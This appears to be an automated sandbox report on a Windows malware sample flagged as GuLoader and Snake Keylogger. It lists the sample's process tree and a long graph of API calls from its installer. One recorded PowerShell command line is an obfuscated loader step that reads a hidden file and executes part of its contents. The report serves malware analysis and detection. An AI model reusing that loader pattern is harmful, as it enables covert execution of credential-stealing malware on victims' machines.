                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:07:21:01
                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\87h216Snb7.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\87h216Snb7.exe"
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:924'744 bytes
                                                                                                                                                          MD5 hash:C9007399358B2C71F94731C0DADA3AAE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:07:21:04
                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)"
                                                                                                                                                          Imagebase:0x720000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:07:21:04
                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:08:58:57
                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                          Imagebase:0x610000
                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:22.2%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:16.9%
                                                                                                                                                            Total number of Nodes:1376
                                                                                                                                                            Total number of Limit Nodes:37
                                                                                                                                                            execution_graph 4096 401bc0 4097 401c11 4096->4097 4098 401bcd 4096->4098 4100 401c16 4097->4100 4101 401c3b GlobalAlloc 4097->4101 4099 4023af 4098->4099 4104 401be4 4098->4104 4102 40657e 21 API calls 4099->4102 4108 401c56 4100->4108 4117 406541 lstrcpynW 4100->4117 4103 40657e 21 API calls 4101->4103 4106 4023bc 4102->4106 4103->4108 4115 406541 lstrcpynW 4104->4115 4110 405ba1 MessageBoxIndirectW 4106->4110 4109 401c28 GlobalFree 4109->4108 4110->4108 4111 401bf3 4116 406541 lstrcpynW 4111->4116 4113 401c02 4118 406541 lstrcpynW 4113->4118 4115->4111 4116->4113 4117->4109 4118->4108 3225 403fc1 3226 403fd9 3225->3226 3227 40413a 3225->3227 3226->3227 3228 403fe5 3226->3228 3229 40418b 3227->3229 3230 40414b GetDlgItem GetDlgItem 3227->3230 3232 403ff0 SetWindowPos 3228->3232 3233 404003 3228->3233 3231 4041e5 3229->3231 3239 401389 2 API calls 3229->3239 3234 4044c0 22 API calls 3230->3234 3240 404135 3231->3240 3298 40450c 3231->3298 3232->3233 3236 40400c ShowWindow 3233->3236 3237 40404e 3233->3237 3238 404175 SetClassLongW 3234->3238 3241 404127 3236->3241 3242 40402c GetWindowLongW 3236->3242 3243 404056 DestroyWindow 3237->3243 3244 40406d 3237->3244 3245 40140b 2 API calls 3238->3245 3249 4041bd 3239->3249 3337 404527 3241->3337 3242->3241 3251 404045 ShowWindow 3242->3251 3246 404449 3243->3246 3247 404072 SetWindowLongW 3244->3247 3248 404083 3244->3248 3245->3229 3246->3240 3258 40447a ShowWindow 3246->3258 3247->3240 3248->3241 3252 40408f GetDlgItem 3248->3252 3249->3231 3253 4041c1 SendMessageW 3249->3253 3251->3237 3256 4040a0 SendMessageW IsWindowEnabled 3252->3256 3257 4040bd 3252->3257 3253->3240 3254 40140b 2 API calls 3266 4041f7 3254->3266 3255 40444b DestroyWindow EndDialog 3255->3246 3256->3240 3256->3257 3260 4040ca 3257->3260 3263 404111 SendMessageW 3257->3263 3264 4040dd 3257->3264 3272 4040c2 3257->3272 3258->3240 3260->3263 3260->3272 3262 4044c0 22 API calls 3262->3266 3263->3241 3267 4040e5 3264->3267 3268 4040fa 3264->3268 3265 4040f8 3265->3241 3266->3240 3266->3254 3266->3255 3266->3262 3289 40438b DestroyWindow 3266->3289 3301 40657e 3266->3301 3318 4044c0 3266->3318 3331 40140b 3267->3331 3269 40140b 2 API calls 3268->3269 3271 404101 3269->3271 3271->3241 3271->3272 3334 404499 3272->3334 3274 404272 GetDlgItem 3275 404287 3274->3275 3276 40428f ShowWindow KiUserCallbackDispatcher 3274->3276 3275->3276 3321 4044e2 KiUserCallbackDispatcher 3276->3321 3278 4042b9 EnableWindow 3283 4042cd 3278->3283 3279 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3280 404302 SendMessageW 3279->3280 3279->3283 3280->3283 3283->3279 3322 4044f5 SendMessageW 3283->3322 3323 403fa2 3283->3323 3326 406541 lstrcpynW 3283->3326 3285 404331 lstrlenW 3286 40657e 21 API calls 3285->3286 3287 404347 SetWindowTextW 3286->3287 3327 401389 3287->3327 3289->3246 3290 4043a5 CreateDialogParamW 3289->3290 3290->3246 3291 4043d8 3290->3291 3292 4044c0 22 API calls 3291->3292 3293 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3292->3293 3294 401389 2 API calls 3293->3294 3295 404429 3294->3295 3295->3240 3296 404431 ShowWindow 3295->3296 3297 40450c SendMessageW 3296->3297 3297->3246 3299 404524 3298->3299 3300 404515 SendMessageW 3298->3300 3299->3266 3300->3299 3302 406589 3301->3302 3303 4067d0 3302->3303 3306 4067a1 lstrlenW 3302->3306 3310 40669a GetSystemDirectoryW 3302->3310 3311 40657e 15 API calls 3302->3311 3312 4066b0 GetWindowsDirectoryW 3302->3312 3314 40657e 15 API calls 3302->3314 3315 406742 lstrcatW 3302->3315 3317 406712 SHGetPathFromIDListW CoTaskMemFree 3302->3317 3351 40640f 3302->3351 3356 406935 GetModuleHandleA 3302->3356 3362 4067ef 3302->3362 3371 406488 wsprintfW 3302->3371 3372 406541 lstrcpynW 3302->3372 3304 4067e9 3303->3304 3373 406541 lstrcpynW 3303->3373 3304->3266 3306->3302 3310->3302 3311->3306 3312->3302 3314->3302 3315->3302 3317->3302 3319 40657e 21 API calls 3318->3319 3320 4044cb SetDlgItemTextW 3319->3320 3320->3274 3321->3278 3322->3283 3324 40657e 21 API calls 3323->3324 3325 403fb0 SetWindowTextW 3324->3325 3325->3283 3326->3285 3329 401390 3327->3329 3328 4013fe 3328->3266 3329->3328 3330 4013cb MulDiv SendMessageW 3329->3330 3330->3329 3332 401389 2 API calls 3331->3332 3333 401420 3332->3333 3333->3272 3335 4044a0 3334->3335 3336 4044a6 SendMessageW 3334->3336 3335->3336 3336->3265 3338 4045ea 3337->3338 3339 40453f GetWindowLongW 3337->3339 3338->3240 3339->3338 3340 404554 3339->3340 3340->3338 3341 404581 GetSysColor 3340->3341 3342 404584 3340->3342 3341->3342 3343 404594 SetBkMode 3342->3343 3344 40458a SetTextColor 3342->3344 3345 4045b2 3343->3345 3346 4045ac GetSysColor 3343->3346 3344->3343 3347 4045c3 3345->3347 3348 4045b9 SetBkColor 3345->3348 3346->3345 3347->3338 3349 4045d6 DeleteObject 3347->3349 3350 4045dd CreateBrushIndirect 3347->3350 3348->3347 3349->3350 3350->3338 3374 4063ae 3351->3374 3354 406443 RegQueryValueExW RegCloseKey 3355 406473 3354->3355 3355->3302 3357 406951 3356->3357 3358 40695b GetProcAddress 3356->3358 3378 4068c5 GetSystemDirectoryW 3357->3378 3361 40696a 3358->3361 3360 406957 3360->3358 3360->3361 3361->3302 3369 4067fc 3362->3369 3363 406872 3364 406877 CharPrevW 3363->3364 3367 406898 3363->3367 3364->3363 3365 406865 CharNextW 3365->3363 3365->3369 3367->3302 3368 406851 CharNextW 3368->3369 3369->3363 3369->3365 3369->3368 3370 406860 CharNextW 3369->3370 3381 405e3d 3369->3381 3370->3365 3371->3302 3372->3302 3373->3304 3375 4063bd 3374->3375 3376 4063c1 3375->3376 3377 4063c6 RegOpenKeyExW 3375->3377 3376->3354 3376->3355 3377->3376 3379 4068e7 wsprintfW LoadLibraryExW 3378->3379 3379->3360 3382 405e43 3381->3382 3383 405e59 3382->3383 3384 405e4a CharNextW 3382->3384 3383->3369 3384->3382 4119 402641 4120 402dcb 21 API calls 4119->4120 4121 402648 4120->4121 4124 406031 GetFileAttributesW CreateFileW 4121->4124 4123 402654 4124->4123 3385 4025c3 3396 402e0b 3385->3396 3389 4025d6 3390 4025f2 RegEnumKeyW 3389->3390 3391 4025fe RegEnumValueW 3389->3391 3394 402953 3389->3394 3392 40261a RegCloseKey 3390->3392 3391->3392 3393 402613 3391->3393 3392->3394 3393->3392 3404 402dcb 3396->3404 3398 402e22 3399 4063ae RegOpenKeyExW 3398->3399 3400 4025cd 3399->3400 3401 402da9 3400->3401 3402 40657e 21 API calls 3401->3402 3403 402dbe 3402->3403 3403->3389 3405 402dd7 3404->3405 3406 40657e 21 API calls 3405->3406 3407 402df8 3406->3407 3408 402e04 3407->3408 3409 4067ef 5 API calls 3407->3409 3408->3398 3409->3408 3641 4015c8 3642 402dcb 21 API calls 3641->3642 3643 4015cf SetFileAttributesW 3642->3643 3644 4015e1 3643->3644 3645 401fc9 3646 402dcb 21 API calls 3645->3646 3647 401fcf 3646->3647 3648 4055c6 28 API calls 3647->3648 3649 401fd9 3648->3649 3660 405b24 CreateProcessW 3649->3660 3654 401ff4 3656 402004 3654->3656 3657 401ff9 3654->3657 3655 402953 3659 402002 CloseHandle 3656->3659 3668 406488 wsprintfW 3657->3668 3659->3655 3661 401fdf 3660->3661 3662 405b57 CloseHandle 3660->3662 3661->3655 3661->3659 3663 4069e0 WaitForSingleObject 3661->3663 3662->3661 3664 4069fa 3663->3664 3665 406a0c GetExitCodeProcess 3664->3665 3669 406971 3664->3669 3665->3654 3668->3659 3670 40698e PeekMessageW 3669->3670 3671 406984 DispatchMessageW 3670->3671 3672 40699e WaitForSingleObject 3670->3672 3671->3670 3672->3664 3673 4021cf 3674 402dcb 21 API calls 3673->3674 3675 4021d6 3674->3675 3676 402dcb 21 API calls 3675->3676 3677 4021e0 3676->3677 3678 402dcb 21 API calls 3677->3678 3679 4021ea 3678->3679 3680 402dcb 21 API calls 3679->3680 3681 4021f4 3680->3681 3682 402dcb 21 API calls 3681->3682 3683 4021fe 3682->3683 3684 40223d CoCreateInstance 3683->3684 3685 402dcb 21 API calls 3683->3685 3688 40225c 3684->3688 3685->3684 3686 401423 28 API calls 3687 40231b 3686->3687 3688->3686 3688->3687 3689 40204f 3690 402dcb 21 API calls 3689->3690 3691 402056 3690->3691 3692 406935 5 API calls 3691->3692 3693 402065 GetFileVersionInfoSizeW 3692->3693 3694 402081 GlobalAlloc 3693->3694 3695 402c4f 3693->3695 3694->3695 3696 402095 3694->3696 3697 406935 5 API calls 3696->3697 3698 40209c 3697->3698 3699 406935 5 API calls 3698->3699 3701 4020a6 3699->3701 3700 4020f1 3700->3695 3701->3700 3705 406488 wsprintfW 3701->3705 3703 4020df 3706 406488 wsprintfW 3703->3706 3705->3703 3706->3700 4135 40254f 4136 402e0b 21 API calls 4135->4136 4137 402559 4136->4137 4138 402dcb 21 API calls 4137->4138 4139 402562 4138->4139 4140 40256d RegQueryValueExW 4139->4140 4145 402953 4139->4145 4141 402593 RegCloseKey 4140->4141 4142 40258d 4140->4142 4141->4145 4142->4141 4146 406488 wsprintfW 4142->4146 4146->4141 4147 403bd1 4148 403bdc 4147->4148 4149 403be0 4148->4149 4150 403be3 GlobalAlloc 4148->4150 4150->4149 4158 401a55 4159 402dcb 21 API calls 4158->4159 4160 401a5e ExpandEnvironmentStringsW 4159->4160 4161 401a72 4160->4161 4162 401a85 4160->4162 4161->4162 4163 401a77 lstrcmpW 4161->4163 4163->4162 3819 4023d7 3820 4023e5 3819->3820 3821 4023df 3819->3821 3823 402dcb 21 API calls 3820->3823 3825 4023f3 3820->3825 3822 402dcb 21 API calls 3821->3822 3822->3820 3823->3825 3824 402401 3827 402dcb 21 API calls 3824->3827 3825->3824 3826 402dcb 21 API calls 3825->3826 3826->3824 3828 40240a WritePrivateProfileStringW 3827->3828 4164 4014d7 4165 402da9 21 API calls 4164->4165 4166 4014dd Sleep 4165->4166 4168 402c4f 4166->4168 3829 402459 3830 402461 3829->3830 3831 40248c 3829->3831 3832 402e0b 21 API calls 3830->3832 3833 402dcb 21 API calls 3831->3833 3834 402468 3832->3834 3835 402493 3833->3835 3836 402472 3834->3836 3840 4024a0 3834->3840 3841 402e89 3835->3841 3838 402dcb 21 API calls 3836->3838 3839 402479 RegDeleteValueW RegCloseKey 3838->3839 3839->3840 3842 402e96 3841->3842 3843 402e9d 3841->3843 3842->3840 3843->3842 3845 402ece 3843->3845 3846 4063ae RegOpenKeyExW 3845->3846 3847 402efc 3846->3847 3848 402f0c RegEnumValueW 3847->3848 3849 402f2f 3847->3849 3856 402fa6 3847->3856 3848->3849 3850 402f96 RegCloseKey 3848->3850 3849->3850 3851 402f6b RegEnumKeyW 3849->3851 3852 402f74 RegCloseKey 3849->3852 3855 402ece 6 API calls 3849->3855 3850->3856 3851->3849 3851->3852 3853 406935 5 API calls 3852->3853 3854 402f84 3853->3854 3854->3856 3857 402f88 RegDeleteKeyW 3854->3857 3855->3849 3856->3842 3857->3856 4174 40175a 4175 402dcb 21 API calls 4174->4175 4176 401761 SearchPathW 4175->4176 4177 40177c 4176->4177 4178 401d5d 4179 402da9 21 API calls 4178->4179 4180 401d64 4179->4180 4181 402da9 21 API calls 4180->4181 4182 401d70 GetDlgItem 4181->4182 4183 40265d 4182->4183 4184 406c5f 4190 406ae3 4184->4190 4185 40744e 4186 406b64 GlobalFree 4187 406b6d GlobalAlloc 4186->4187 4187->4185 4187->4190 4188 406be4 GlobalAlloc 4188->4185 4188->4190 4189 406bdb GlobalFree 4189->4188 4190->4185 4190->4186 4190->4187 4190->4188 4190->4189 4191 402663 4192 402692 4191->4192 4193 402677 4191->4193 4195 4026c2 4192->4195 4196 402697 4192->4196 4194 402da9 21 API calls 4193->4194 4205 40267e 4194->4205 4198 402dcb 21 API calls 4195->4198 4197 402dcb 21 API calls 4196->4197 4199 40269e 4197->4199 4200 4026c9 lstrlenW 4198->4200 4208 406563 WideCharToMultiByte 4199->4208 4200->4205 4202 4026b2 lstrlenA 4202->4205 4203 40270c 4204 4026f6 4204->4203 4206 4060e3 WriteFile 4204->4206 4205->4203 4205->4204 4209 406112 SetFilePointer 4205->4209 4206->4203 4208->4202 4210 406146 4209->4210 4211 40612e 4209->4211 4210->4204 4212 4060b4 ReadFile 4211->4212 4213 40613a 4212->4213 4213->4210 4214 406177 SetFilePointer 4213->4214 4215 40614f SetFilePointer 4213->4215 4214->4210 4215->4214 4216 40615a 4215->4216 4217 4060e3 WriteFile 4216->4217 4217->4210 3476 4015e6 3477 402dcb 21 API calls 3476->3477 3478 4015ed 3477->3478 3496 405ebb CharNextW CharNextW 3478->3496 3480 4015f6 3481 401656 3480->3481 3482 405e3d CharNextW 3480->3482 3492 40161f 3480->3492 3493 40163c GetFileAttributesW 3480->3493 3506 405b0c 3480->3506 3512 405aef CreateDirectoryW 3480->3512 3483 401688 3481->3483 3484 40165b 3481->3484 3482->3480 3486 401423 28 API calls 3483->3486 3502 401423 3484->3502 3494 401680 3486->3494 3491 40166f SetCurrentDirectoryW 3491->3494 3492->3480 3509 405a95 CreateDirectoryW 3492->3509 3493->3480 3497 405ed8 3496->3497 3500 405eea 3496->3500 3498 405ee5 CharNextW 3497->3498 3497->3500 3501 405f0e 3498->3501 3499 405e3d CharNextW 3499->3500 3500->3499 3500->3501 3501->3480 3503 4055c6 28 API calls 3502->3503 3504 401431 3503->3504 3505 406541 lstrcpynW 3504->3505 3505->3491 3507 406935 5 API calls 3506->3507 3508 405b13 3507->3508 3508->3480 3510 405ae5 GetLastError 3509->3510 3511 405ae1 3509->3511 3510->3511 3511->3492 3513 405b03 GetLastError 3512->3513 3514 405aff 3512->3514 3513->3514 3514->3480 3515 401966 3516 401968 3515->3516 3517 402dcb 21 API calls 3516->3517 3518 40196d 3517->3518 3521 405c4d 3518->3521 3560 405f18 3521->3560 3524 405c75 DeleteFileW 3526 401976 3524->3526 3525 405c8c 3528 405dac 3525->3528 3574 406541 lstrcpynW 3525->3574 3528->3526 3592 40689e FindFirstFileW 3528->3592 3529 405cb2 3530 405cc5 3529->3530 3531 405cb8 lstrcatW 3529->3531 3575 405e5c lstrlenW 3530->3575 3532 405ccb 3531->3532 3535 405cdb lstrcatW 3532->3535 3537 405ce6 lstrlenW FindFirstFileW 3532->3537 3535->3537 3537->3528 3546 405d08 3537->3546 3538 405dd5 3595 405e10 lstrlenW CharPrevW 3538->3595 3541 405d8f FindNextFileW 3544 405da5 FindClose 3541->3544 3541->3546 3542 405c05 5 API calls 3545 405de7 3542->3545 3544->3528 3547 405e01 3545->3547 3548 405deb 3545->3548 3546->3541 3555 405d50 3546->3555 3579 406541 lstrcpynW 3546->3579 3550 4055c6 28 API calls 3547->3550 3548->3526 3551 4055c6 28 API calls 3548->3551 3550->3526 3553 405df8 3551->3553 3552 405c4d 64 API calls 3552->3555 3554 406301 40 API calls 3553->3554 3557 405dff 3554->3557 3555->3541 3555->3552 3556 4055c6 28 API calls 3555->3556 3558 4055c6 28 API calls 3555->3558 3580 405c05 3555->3580 3588 406301 MoveFileExW 3555->3588 3556->3541 3557->3526 3558->3555 3598 406541 lstrcpynW 3560->3598 3562 405f29 3563 405ebb 4 API calls 3562->3563 3564 405f2f 3563->3564 3565 405c6d 3564->3565 3566 4067ef 5 API calls 3564->3566 3565->3524 3565->3525 3572 405f3f 3566->3572 3567 405f70 lstrlenW 3568 405f7b 3567->3568 3567->3572 3570 405e10 3 API calls 3568->3570 3569 40689e 2 API calls 3569->3572 3571 405f80 GetFileAttributesW 3570->3571 3571->3565 3572->3565 3572->3567 3572->3569 3573 405e5c 2 API calls 3572->3573 3573->3567 3574->3529 3576 405e6a 3575->3576 3577 405e70 CharPrevW 3576->3577 3578 405e7c 3576->3578 3577->3576 3577->3578 3578->3532 3579->3546 3599 40600c GetFileAttributesW 3580->3599 3583 405c32 3583->3555 3584 405c20 RemoveDirectoryW 3586 405c2e 3584->3586 3585 405c28 DeleteFileW 3585->3586 3586->3583 3587 405c3e SetFileAttributesW 3586->3587 3587->3583 3589 406322 3588->3589 3590 406315 3588->3590 3589->3555 3602 406187 3590->3602 3593 4068b4 FindClose 3592->3593 3594 405dd1 3592->3594 3593->3594 3594->3526 3594->3538 3596 405ddb 3595->3596 3597 405e2c lstrcatW 3595->3597 3596->3542 3597->3596 3598->3562 3600 405c11 3599->3600 3601 40601e SetFileAttributesW 3599->3601 3600->3583 3600->3584 3600->3585 3601->3600 3603 4061b7 3602->3603 3604 4061dd GetShortPathNameW 3602->3604 3629 406031 GetFileAttributesW CreateFileW 3603->3629 3606 4061f2 3604->3606 3607 4062fc 3604->3607 3606->3607 3608 4061fa wsprintfA 3606->3608 3607->3589 3610 40657e 21 API calls 3608->3610 3609 4061c1 CloseHandle GetShortPathNameW 3609->3607 3611 4061d5 3609->3611 3612 406222 3610->3612 3611->3604 3611->3607 3630 406031 GetFileAttributesW CreateFileW 3612->3630 3614 40622f 3614->3607 3615 40623e GetFileSize GlobalAlloc 3614->3615 3616 406260 3615->3616 3617 4062f5 CloseHandle 3615->3617 3631 4060b4 ReadFile 3616->3631 3617->3607 3622 406293 3624 405f96 4 API calls 3622->3624 3623 40627f lstrcpyA 3625 4062a1 3623->3625 3624->3625 3626 4062d8 SetFilePointer 3625->3626 3638 4060e3 WriteFile 3626->3638 3629->3609 3630->3614 3632 4060d2 3631->3632 3632->3617 3633 405f96 lstrlenA 3632->3633 3634 405fd7 lstrlenA 3633->3634 3635 405fb0 lstrcmpiA 3634->3635 3636 405fdf 3634->3636 3635->3636 3637 405fce CharNextA 3635->3637 3636->3622 3636->3623 3637->3634 3639 406101 GlobalFree 3638->3639 3639->3617 3640 405b67 ShellExecuteExW 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4231 401cfd 4229->4231 4232 401cb1 4230->4232 4233 402dcb 21 API calls 4231->4233 4234 402da9 21 API calls 4232->4234 4236 401d06 FindWindowExW 4233->4236 4235 401cbd 4234->4235 4237 401ce8 SendMessageW 4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4256 4049ac 4254->4256 4257 404987 SetDlgItemTextW 4255->4257 4257->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4263 40689e 2 API calls 4261->4263 4261->4267 4262 401748 GetShortPathNameW 4264 402c4f 4262->4264 4265 401723 4263->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4264 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4289 4029c5 GlobalAlloc 4285->4289 4290 402a48 4285->4290 4287 402a67 DeleteFileW 4286->4287 4288 402a7a 4286->4288 4287->4288 4289->4290 4292 4029de 4289->4292 4291 4032d9 39 API calls 4290->4291 4294 402a55 CloseHandle 4291->4294 4306 4034d4 SetFilePointer 4292->4306 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4290 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 40210f 4314->4315 4325 4021c1 4314->4325 4316 402dcb 21 API calls 4315->4316 4318 402116 4316->4318 4317 401423 28 API calls 4321 40231b 4317->4321 4319 402dcb 21 API calls 4318->4319 4320 40211f 4319->4320 4322 402135 LoadLibraryExW 4320->4322 4323 402127 GetModuleHandleW 4320->4323 4324 402146 4322->4324 4322->4325 4323->4322 4323->4324 4334 4069a4 4324->4334 4325->4317 4328 402190 4330 4055c6 28 API calls 4328->4330 4329 402157 4331 401423 28 API calls 4329->4331 4332 402167 4329->4332 4330->4332 4331->4332 4332->4321 4333 4021b3 FreeLibrary 4332->4333 4333->4321 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4344 402da9 21 API calls 4342->4344 4348 402bce 4342->4348 4345 402bd7 4343->4345 4347 402b93 4344->4347 4346 402dcb 21 API calls 4345->4346 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4374 4047b1 4366->4374 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 4048a6 4370->4372 4373 40483f 4370->4373 4375 4046fe 4371->4375 4372->4369 4381 4048b8 4372->4381 4373->4372 4380 404865 SendMessageW LoadCursorW SetCursor 4373->4380 4374->4368 4374->4369 4377 4047ec GetDlgItem SendMessageW 4374->4377 4378 4044c0 22 API calls 4375->4378 4379 4048e0 4376->4379 4399 4044e2 KiUserCallbackDispatcher 4377->4399 4384 40470b CheckDlgButton 4378->4384 4403 40492e 4380->4403 4386 4048ce 4381->4386 4387 4048be SendMessageW 4381->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4379 4391 4048d4 SendMessageW 4386->4391 4387->4386 4391->4379 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4379 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4372 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4428 402953 4420->4428 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4427 40657e 21 API calls 4424->4427 4426 402da9 21 API calls 4425->4426 4426->4431 4427->4431 4431->4428 4433 406488 wsprintfW 4431->4433 4432->4428 4433->4428 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 4443 401503 4444 401508 4443->4444 4445 40152e 4443->4445 4446 402da9 21 API calls 4444->4446 4446->4445 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4452 402921 4448->4452 4450 402968 4449->4450 4449->4452 4453 406541 lstrcpynW 4450->4453 4453->4452 3410 405705 3411 405726 GetDlgItem GetDlgItem GetDlgItem 3410->3411 3412 4058af 3410->3412 3455 4044f5 SendMessageW 3411->3455 3414 4058e0 3412->3414 3415 4058b8 GetDlgItem CreateThread CloseHandle 3412->3415 3417 40590b 3414->3417 3418 405930 3414->3418 3419 4058f7 ShowWindow ShowWindow 3414->3419 3415->3414 3469 405699 OleInitialize 3415->3469 3416 405796 3425 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3416->3425 3420 40596b 3417->3420 3422 405945 